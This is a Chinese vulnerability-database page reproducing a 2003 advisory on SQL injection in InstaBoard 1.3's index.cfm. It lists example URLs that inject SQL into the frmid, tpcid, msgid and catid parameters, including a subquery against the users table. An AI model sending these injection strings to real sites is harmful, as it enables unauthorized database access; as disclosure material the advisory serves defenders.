InstaBoard 1.3 – ‘index.cfm’ SQL Injection

InstaBoard 1.3 – ‘index.cfm’ SQL Injection

漏洞ID 1053826 漏洞类型
发布时间 2003-04-14 更新时间 2003-04-14
图片[1]-InstaBoard 1.3 – ‘index.cfm’ SQL Injection-安全小百科CVE编号 N/A
图片[2]-InstaBoard 1.3 – ‘index.cfm’ SQL Injection-安全小百科CNNVD-ID N/A
漏洞平台 CFM CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22486
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7338/info

It has been reported that multiple input validation errors exist in the index.cfm file included with InstaBoard. Because of this issue, remote attackers may launch SQL injection attacks through the software.

The consequences may vary depending on the particular database implementation and the nature of the specific queries. SQL injection also makes it possible, under some circumstances, to exploit latent vulnerabilities that may exist in the underlying database.

It should be noted that although this vulnerability has been reported to affect InstaBoard version 1.3 previous versions might also be affected. 

http://www.example.com/instaboard/index.cfm?frmid=1%20AND%20u.userid%20IN%20(select%20userid%20from%20users)
http://www.example.com/instaboard/index.cfm?frmid=1&tpcid=1%20SQL
http://www.example.com/instaboard/index.cfm?frmid=1%20SQL&tpcid=1
http://www.example.com/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1%20SQL&msgid=11
http://www.example.com/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1&msgid=11%20SQL
http://www.example.com/instaboard/index.cfm?catid=1%20SQL

相关推荐: Cisco 600 Series Web Administration Denial of Service Vulnerability

Cisco 600 Series Web Administration Denial of Service Vulnerability 漏洞ID 1103589 漏洞类型 Failure to Handle Exceptional Conditions 发布时…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享